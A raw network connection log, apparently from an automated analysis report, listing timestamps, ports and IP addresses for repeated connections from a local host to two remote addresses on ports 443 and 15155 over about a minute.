May 2, 2024 06:03:58.771101952 CEST	443	49821	104.20.3.235	192.168.2.4
May 2, 2024 06:03:58.955241919 CEST	443	49821	104.20.3.235	192.168.2.4
May 2, 2024 06:03:58.959054947 CEST	49821	443	192.168.2.4	104.20.3.235
May 2, 2024 06:03:58.959074020 CEST	443	49821	104.20.3.235	192.168.2.4
May 2, 2024 06:03:59.182955027 CEST	443	49821	104.20.3.235	192.168.2.4
May 2, 2024 06:03:59.183063984 CEST	443	49821	104.20.3.235	192.168.2.4
May 2, 2024 06:03:59.183159113 CEST	49821	443	192.168.2.4	104.20.3.235
May 2, 2024 06:03:59.184459925 CEST	49821	443	192.168.2.4	104.20.3.235
May 2, 2024 06:03:59.810877085 CEST	49822	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:03:59.980602980 CEST	15155	49822	3.124.142.205	192.168.2.4
May 2, 2024 06:04:00.496238947 CEST	49822	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:00.666065931 CEST	15155	49822	3.124.142.205	192.168.2.4
May 2, 2024 06:04:01.169038057 CEST	49822	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:01.338835955 CEST	15155	49822	3.124.142.205	192.168.2.4
May 2, 2024 06:04:01.843156099 CEST	49822	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:02.013335943 CEST	15155	49822	3.124.142.205	192.168.2.4
May 2, 2024 06:04:02.522164106 CEST	49822	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:02.691895962 CEST	15155	49822	3.124.142.205	192.168.2.4
May 2, 2024 06:04:03.231385946 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.231426001 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.231529951 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.231898069 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.231911898 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.412369013 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.459650993 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.500742912 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.500765085 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.656626940 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.656737089 CEST	443	49823	104.20.3.235	192.168.2.4
May 2, 2024 06:04:03.656825066 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:03.658097982 CEST	49823	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:04.242193937 CEST	49824	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:04.410753965 CEST	15155	49824	3.124.142.205	192.168.2.4
May 2, 2024 06:04:04.975285053 CEST	49824	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:05.144329071 CEST	15155	49824	3.124.142.205	192.168.2.4
May 2, 2024 06:04:05.679625034 CEST	49824	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:05.848232031 CEST	15155	49824	3.124.142.205	192.168.2.4
May 2, 2024 06:04:06.370603085 CEST	49824	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:06.540750980 CEST	15155	49824	3.124.142.205	192.168.2.4
May 2, 2024 06:04:07.177126884 CEST	49824	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:07.345604897 CEST	15155	49824	3.124.142.205	192.168.2.4
May 2, 2024 06:04:07.347871065 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:07.347956896 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.348038912 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:07.348433971 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:07.348468065 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.530000925 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.531970024 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:07.532015085 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.761229038 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.761337996 CEST	443	49825	104.20.3.235	192.168.2.4
May 2, 2024 06:04:07.761406898 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:07.766315937 CEST	49825	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:08.314397097 CEST	49826	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:08.483434916 CEST	15155	49826	3.124.142.205	192.168.2.4
May 2, 2024 06:04:09.012073040 CEST	49826	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:09.181871891 CEST	15155	49826	3.124.142.205	192.168.2.4
May 2, 2024 06:04:09.685456991 CEST	49826	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:09.854404926 CEST	15155	49826	3.124.142.205	192.168.2.4
May 2, 2024 06:04:10.359141111 CEST	49826	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:10.528386116 CEST	15155	49826	3.124.142.205	192.168.2.4
May 2, 2024 06:04:11.031053066 CEST	49826	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:11.200517893 CEST	15155	49826	3.124.142.205	192.168.2.4
May 2, 2024 06:04:11.204796076 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:11.204822063 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.204957008 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:11.205286026 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:11.205295086 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.390903950 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.393961906 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:11.393978119 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.618844986 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.618961096 CEST	443	49827	104.20.3.235	192.168.2.4
May 2, 2024 06:04:11.619021893 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:11.631366968 CEST	49827	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:12.146563053 CEST	49828	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:12.316049099 CEST	15155	49828	3.124.142.205	192.168.2.4
May 2, 2024 06:04:12.825880051 CEST	49828	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:12.995460033 CEST	15155	49828	3.124.142.205	192.168.2.4
May 2, 2024 06:04:13.511543036 CEST	49828	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:13.681191921 CEST	15155	49828	3.124.142.205	192.168.2.4
May 2, 2024 06:04:14.183418036 CEST	49828	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:14.352843046 CEST	15155	49828	3.124.142.205	192.168.2.4
May 2, 2024 06:04:14.855350971 CEST	49828	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:15.024867058 CEST	15155	49828	3.124.142.205	192.168.2.4
May 2, 2024 06:04:15.028089046 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.028143883 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.028223038 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.029159069 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.029172897 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.214632988 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.220680952 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.220705986 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.444974899 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.445072889 CEST	443	49829	104.20.3.235	192.168.2.4
May 2, 2024 06:04:15.445158005 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.450700045 CEST	49829	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:15.935936928 CEST	49830	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:16.103555918 CEST	15155	49830	3.124.142.205	192.168.2.4
May 2, 2024 06:04:16.667560101 CEST	49830	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:16.834944963 CEST	15155	49830	3.124.142.205	192.168.2.4
May 2, 2024 06:04:17.441399097 CEST	49830	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:17.611778021 CEST	15155	49830	3.124.142.205	192.168.2.4
May 2, 2024 06:04:18.201809883 CEST	49830	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:18.369267941 CEST	15155	49830	3.124.142.205	192.168.2.4
May 2, 2024 06:04:18.874392986 CEST	49830	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:19.041745901 CEST	15155	49830	3.124.142.205	192.168.2.4
May 2, 2024 06:04:19.045564890 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.045595884 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.045758963 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.046550035 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.046560049 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.228920937 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.236738920 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.236757994 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.453934908 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.454046965 CEST	443	49831	104.20.3.235	192.168.2.4
May 2, 2024 06:04:19.454276085 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.455559015 CEST	49831	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:19.998150110 CEST	49832	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:20.166738033 CEST	15155	49832	3.124.142.205	192.168.2.4
May 2, 2024 06:04:20.667912960 CEST	49832	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:20.836406946 CEST	15155	49832	3.124.142.205	192.168.2.4
May 2, 2024 06:04:21.340141058 CEST	49832	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:21.508729935 CEST	15155	49832	3.124.142.205	192.168.2.4
May 2, 2024 06:04:22.011385918 CEST	49832	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:22.180011988 CEST	15155	49832	3.124.142.205	192.168.2.4
May 2, 2024 06:04:22.683487892 CEST	49832	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:22.852082014 CEST	15155	49832	3.124.142.205	192.168.2.4
May 2, 2024 06:04:22.860260010 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:22.860284090 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:22.860399961 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:22.864873886 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:22.864888906 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:23.048652887 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:23.052225113 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:23.052241087 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:23.276366949 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:23.276473999 CEST	443	49833	104.20.3.235	192.168.2.4
May 2, 2024 06:04:23.276529074 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:23.282481909 CEST	49833	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:23.700819016 CEST	49834	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:23.871566057 CEST	15155	49834	3.124.142.205	192.168.2.4
May 2, 2024 06:04:24.380742073 CEST	49834	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:24.550987959 CEST	15155	49834	3.124.142.205	192.168.2.4
May 2, 2024 06:04:25.058475018 CEST	49834	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:25.228451967 CEST	15155	49834	3.124.142.205	192.168.2.4
May 2, 2024 06:04:25.730492115 CEST	49834	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:25.900530100 CEST	15155	49834	3.124.142.205	192.168.2.4
May 2, 2024 06:04:26.402262926 CEST	49834	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:26.572295904 CEST	15155	49834	3.124.142.205	192.168.2.4
May 2, 2024 06:04:26.576169014 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:26.576216936 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.576286077 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:26.577564955 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:26.577589035 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.758241892 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.762835026 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:26.762861967 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.986860991 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.986943960 CEST	443	49835	104.20.3.235	192.168.2.4
May 2, 2024 06:04:26.987024069 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:26.989362001 CEST	49835	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:27.391551971 CEST	49836	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:27.559858084 CEST	15155	49836	3.124.142.205	192.168.2.4
May 2, 2024 06:04:28.075850010 CEST	49836	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:28.244148016 CEST	15155	49836	3.124.142.205	192.168.2.4
May 2, 2024 06:04:28.746277094 CEST	49836	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:28.914457083 CEST	15155	49836	3.124.142.205	192.168.2.4
May 2, 2024 06:04:29.433799028 CEST	49836	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:29.602272034 CEST	15155	49836	3.124.142.205	192.168.2.4
May 2, 2024 06:04:30.105664968 CEST	49836	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:30.273905039 CEST	15155	49836	3.124.142.205	192.168.2.4
May 2, 2024 06:04:30.275490999 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:30.275521040 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.275593042 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:30.275904894 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:30.275914907 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.459026098 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.477843046 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:30.477864027 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.690591097 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.690674067 CEST	443	49837	104.20.3.235	192.168.2.4
May 2, 2024 06:04:30.690716982 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:30.692770004 CEST	49837	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:31.061974049 CEST	49838	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:31.230984926 CEST	15155	49838	3.124.142.205	192.168.2.4
May 2, 2024 06:04:31.792227983 CEST	49838	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:31.960683107 CEST	15155	49838	3.124.142.205	192.168.2.4
May 2, 2024 06:04:32.590194941 CEST	49838	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:32.758634090 CEST	15155	49838	3.124.142.205	192.168.2.4
May 2, 2024 06:04:33.402673006 CEST	49838	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:33.571192026 CEST	15155	49838	3.124.142.205	192.168.2.4
May 2, 2024 06:04:34.197586060 CEST	49838	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:34.365967989 CEST	15155	49838	3.124.142.205	192.168.2.4
May 2, 2024 06:04:34.376420021 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:34.376451015 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.376672029 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:34.377790928 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:34.377801895 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.561561108 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.566943884 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:34.566968918 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.787575006 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.787681103 CEST	443	49839	104.20.3.235	192.168.2.4
May 2, 2024 06:04:34.787740946 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:34.788813114 CEST	49839	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:35.140146017 CEST	49840	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:35.308785915 CEST	15155	49840	3.124.142.205	192.168.2.4
May 2, 2024 06:04:35.996243954 CEST	49840	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:36.164894104 CEST	15155	49840	3.124.142.205	192.168.2.4
May 2, 2024 06:04:36.683639050 CEST	49840	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:36.857532978 CEST	15155	49840	3.124.142.205	192.168.2.4
May 2, 2024 06:04:37.492419004 CEST	49840	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:37.661257982 CEST	15155	49840	3.124.142.205	192.168.2.4
May 2, 2024 06:04:38.172862053 CEST	49840	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:38.341732025 CEST	15155	49840	3.124.142.205	192.168.2.4
May 2, 2024 06:04:38.346263885 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:38.346296072 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.346358061 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:38.346874952 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:38.346885920 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.530111074 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.533576012 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:38.533606052 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.759527922 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.759644032 CEST	443	49841	104.20.3.235	192.168.2.4
May 2, 2024 06:04:38.759733915 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:38.761800051 CEST	49841	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:39.076019049 CEST	49842	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:39.245975018 CEST	15155	49842	3.124.142.205	192.168.2.4
May 2, 2024 06:04:39.752532959 CEST	49842	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:39.922583103 CEST	15155	49842	3.124.142.205	192.168.2.4
May 2, 2024 06:04:40.433432102 CEST	49842	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:40.603611946 CEST	15155	49842	3.124.142.205	192.168.2.4
May 2, 2024 06:04:41.104947090 CEST	49842	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:41.275691986 CEST	15155	49842	3.124.142.205	192.168.2.4
May 2, 2024 06:04:41.776808023 CEST	49842	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:41.946748018 CEST	15155	49842	3.124.142.205	192.168.2.4
May 2, 2024 06:04:41.956655979 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:41.956742048 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:41.956872940 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:41.957823038 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:41.957868099 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:42.141608953 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:42.154083014 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:42.154133081 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:42.372731924 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:42.372915030 CEST	443	49843	104.20.3.235	192.168.2.4
May 2, 2024 06:04:42.373094082 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:42.375271082 CEST	49843	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:42.670053959 CEST	49844	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:42.840044975 CEST	15155	49844	3.124.142.205	192.168.2.4
May 2, 2024 06:04:43.344753027 CEST	49844	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:43.514802933 CEST	15155	49844	3.124.142.205	192.168.2.4
May 2, 2024 06:04:44.027750969 CEST	49844	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:44.198390007 CEST	15155	49844	3.124.142.205	192.168.2.4
May 2, 2024 06:04:44.699619055 CEST	49844	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:44.871051073 CEST	15155	49844	3.124.142.205	192.168.2.4
May 2, 2024 06:04:45.371576071 CEST	49844	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:45.541542053 CEST	15155	49844	3.124.142.205	192.168.2.4
May 2, 2024 06:04:45.583178997 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:45.583255053 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.583354950 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:45.583949089 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:45.583982944 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.768084049 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.771049023 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:45.771107912 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.996933937 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.997006893 CEST	443	49845	104.20.3.235	192.168.2.4
May 2, 2024 06:04:45.997242928 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:45.999048948 CEST	49845	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:46.278029919 CEST	49846	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:46.446607113 CEST	15155	49846	3.124.142.205	192.168.2.4
May 2, 2024 06:04:46.951143980 CEST	49846	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:47.119784117 CEST	15155	49846	3.124.142.205	192.168.2.4
May 2, 2024 06:04:47.620851994 CEST	49846	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:47.789593935 CEST	15155	49846	3.124.142.205	192.168.2.4
May 2, 2024 06:04:48.292838097 CEST	49846	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:48.461426020 CEST	15155	49846	3.124.142.205	192.168.2.4
May 2, 2024 06:04:48.964741945 CEST	49846	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:49.133445978 CEST	15155	49846	3.124.142.205	192.168.2.4
May 2, 2024 06:04:49.136823893 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.136850119 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.136924028 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.137944937 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.137963057 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.320267916 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.324826002 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.324851990 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.545584917 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.545684099 CEST	443	49847	104.20.3.235	192.168.2.4
May 2, 2024 06:04:49.545737028 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.547585964 CEST	49847	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:49.810569048 CEST	49848	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:49.979295969 CEST	15155	49848	3.124.142.205	192.168.2.4
May 2, 2024 06:04:50.480739117 CEST	49848	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:50.649490118 CEST	15155	49848	3.124.142.205	192.168.2.4
May 2, 2024 06:04:51.152599096 CEST	49848	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:51.321408033 CEST	15155	49848	3.124.142.205	192.168.2.4
May 2, 2024 06:04:51.824165106 CEST	49848	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:51.993045092 CEST	15155	49848	3.124.142.205	192.168.2.4
May 2, 2024 06:04:52.496206045 CEST	49848	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:52.665045023 CEST	15155	49848	3.124.142.205	192.168.2.4
May 2, 2024 06:04:52.672318935 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:52.672364950 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:52.672579050 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:52.673428059 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:52.673453093 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:52.856906891 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:52.862413883 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:52.862457037 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:53.084779024 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:53.084901094 CEST	443	49849	104.20.3.235	192.168.2.4
May 2, 2024 06:04:53.085056067 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:53.087413073 CEST	49849	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:53.327578068 CEST	49850	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:53.500830889 CEST	15155	49850	3.124.142.205	192.168.2.4
May 2, 2024 06:04:54.011625051 CEST	49850	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:54.181729078 CEST	15155	49850	3.124.142.205	192.168.2.4
May 2, 2024 06:04:54.683496952 CEST	49850	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:54.853226900 CEST	15155	49850	3.124.142.205	192.168.2.4
May 2, 2024 06:04:55.355410099 CEST	49850	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:55.525214911 CEST	15155	49850	3.124.142.205	192.168.2.4
May 2, 2024 06:04:56.026627064 CEST	49850	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:56.196389914 CEST	15155	49850	3.124.142.205	192.168.2.4
May 2, 2024 06:04:56.199179888 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.199213982 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.199289083 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.199825048 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.199836016 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.382953882 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.384886980 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.384897947 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.612974882 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.613068104 CEST	443	49851	104.20.3.235	192.168.2.4
May 2, 2024 06:04:56.613126040 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.614268064 CEST	49851	443	192.168.2.4	104.20.3.235
May 2, 2024 06:04:56.845235109 CEST	49852	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:57.014548063 CEST	15155	49852	3.124.142.205	192.168.2.4
May 2, 2024 06:04:57.526953936 CEST	49852	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:57.696959019 CEST	15155	49852	3.124.142.205	192.168.2.4
May 2, 2024 06:04:58.198646069 CEST	49852	15155	192.168.2.4	3.124.142.205
May 2, 2024 06:04:58.367990017 CEST	15155	49852	3.124.142.205	192.168.2.4
